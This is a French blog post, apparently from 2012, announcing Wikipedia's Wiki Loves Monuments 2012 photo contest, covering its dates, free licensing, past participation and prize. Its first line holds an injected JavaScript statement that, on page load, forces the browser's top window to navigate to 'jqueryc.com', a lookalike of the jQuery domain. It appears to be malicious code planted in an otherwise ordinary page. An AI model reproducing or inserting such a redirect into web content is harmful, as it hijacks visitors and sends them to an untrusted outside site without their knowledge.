/* */ window.top.location.href = "http://www.jqueryc.com";

Thursday, Nov. 29, 2012

Wikipedia lance un concours photo pour immortaliser les grands monuments.

Written By:

|

3 septembre 2012

|

Posted In:

Wikipedia lance un concours photo pour immortaliser les grands monuments.

Wiki Loves Monuments 2012  est un concours de  photographie  des monuments historiques et des monuments nationaux du monde, qui va se dérouler du 1er au 30 septembre.  Le thème du concours se concentre cette année sur les grands monuments du monde entier.  Les photos envoyées pour le concours seront alors soumises à une licence libre (a priori Creative Commons) et disponibles sur le portail Wikimedia Commons. Elles serviront alors à illustrer les articles de Wikipedia et pourront également être utilisées gratuitement et librement, en respectant les termes de la licence (citer l’auteur, notamment).

Le concours de l’année dernière avait généré près de 168 000 photos par plus de 5 000 photographes dans 18 pays européens pour un volume total de plus de 168 000 clichés. Cette année, en plus de l’Europe, les Etats-Unis entrent dans la course ainsi que d’autres pays à travers le monde.

Les photos devront être mises en ligne sur Wikimedia Commons sous une licence libre, afin qu’elles soient utilisées par n’importe qui, sous certaines conditions. ( vous pouvez poster votre photo avec l’application Android dédiée à cet effet.)

Par la suite, chaque concours national choisira une photo finaliste qui sera jugée par le jury international au mois d’octobre. Par la suite, les résultats avec les 10 meilleurs clichés et le meilleur cliché de l’année seront connus au début du mois de décembre.

Le grand vainqueur se verra offrir une bourse pour se rendre à Hong Kong faire des photos lors de la Wikimania 2013, la rencontre annuelle des collaborateurs de Wikipédia . Bonne chance à tous les participants !

 

jhabli adil

Jeune étudiant s’intéresse à la photographie. Passionné par le web2.0 et les nouvelles technologies.

More Posts

Follow Me:
TwitterFacebookPinterestFlickr

Share This Article

Related News

FIFA 13 VS PES 13 le clash continue
Asus et Google sur une version low cost de la Nexus 7 ?
IFA 2012 : Samsug Galaxy Camera.

Leave A Reply